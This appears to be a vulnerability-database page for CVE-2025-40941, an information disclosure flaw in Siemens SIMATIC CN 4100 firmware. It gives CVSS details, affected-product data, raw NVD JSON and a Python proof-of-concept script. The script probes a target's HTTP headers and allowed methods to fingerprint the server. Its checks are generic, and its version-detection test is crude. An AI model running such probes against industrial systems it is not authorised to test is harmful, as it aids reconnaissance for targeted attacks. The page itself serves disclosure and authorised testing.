Security Vulnerability Report
中文
CVE-2025-40941 CVSS 4.3 MEDIUM

CVE-2025-40941

Published: 2025-12-09 16:17:48
Last Modified: 2025-12-10 21:32:01
Source: [email protected]

Description

A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected devices exposes server information in its responses. This could allow an attacker with network access to gain useful information, increasing the likelihood of targeted attacks.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:* - NOT VULNERABLE
SIMATIC CN 4100 所有 < V4.0.1 版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-40941 PoC - SIMATIC CN 4100 Information Disclosure This PoC demonstrates the information disclosure vulnerability in SIMATIC CN 4100 devices. """ import requests import sys import json def check_vulnerability(target_ip, target_port=443): """ Check if target is vulnerable to CVE-2025-40941 """ print(f"[*] Testing target: {target_ip}:{target_port}") # Target URLs to probe urls = [ f"https://{target_ip}:{target_port}/", f"https://{target_ip}:{target_port}/index.html", f"https://{target_ip}:{target_port}/login", ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', } exposed_info = {} for url in urls: try: print(f"\n[*] Probing: {url}") response = requests.get(url, headers=headers, verify=False, timeout=10) # Check for exposed server information if 'Server' in response.headers: exposed_info['Server_Header'] = response.headers['Server'] print(f"[+] Server Header: {response.headers['Server']}") if 'X-Powered-By' in response.headers: exposed_info['X_Powered_By'] = response.headers['X-Powered-By'] print(f"[+] X-Powered-By: {response.headers['X-Powered-By']}") if 'X-AspNet-Version' in response.headers: exposed_info['AspNet_Version'] = response.headers['X-AspNet-Version'] print(f"[+] ASP.NET Version: {response.headers['X-AspNet-Version']}") # Check response body for version info if 'V' in response.text or 'version' in response.text.lower(): print(f"[!] Potential version information found in response body") print(f"[*] Status Code: {response.status_code}") print(f"[*] Headers: {json.dumps(dict(response.headers), indent=2)}") except requests.exceptions.SSLError: print(f"[!] SSL Error - trying with HTTP") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") # Try OPTIONS method try: print(f"\n[*] Testing OPTIONS method...") options_response = requests.options( f"https://{target_ip}:{target_port}/", verify=False, timeout=10 ) if 'Allow' in options_response.headers: exposed_info['Allowed_Methods'] = options_response.headers['Allow'] print(f"[+] Allowed Methods: {options_response.headers['Allow']}") except: pass # Vulnerability assessment if exposed_info: print(f"\n[+] VULNERABLE - Information disclosure detected!") print(f"[+] Exposed information could aid further attacks") return True, exposed_info else: print(f"\n[-] No obvious information disclosure detected") return False, {} if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 443 vulnerable, info = check_vulnerability(target, port) sys.exit(0 if vulnerable else 1)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40941", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:47.997", "lastModified": "2025-12-10T21:32:01.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected devices exposes server information in its responses.\r\nThis could allow an attacker with network access to gain useful information, increasing the likelihood of targeted attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.0.1", "matchCriteriaId": "FF07D3DA-F412-4FBF-BB1B-3C889F74509E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:*", "matchCriteriaId": "92619F5F-3679-4424-9455-3285FF1EF2F1"}]}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-416652.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.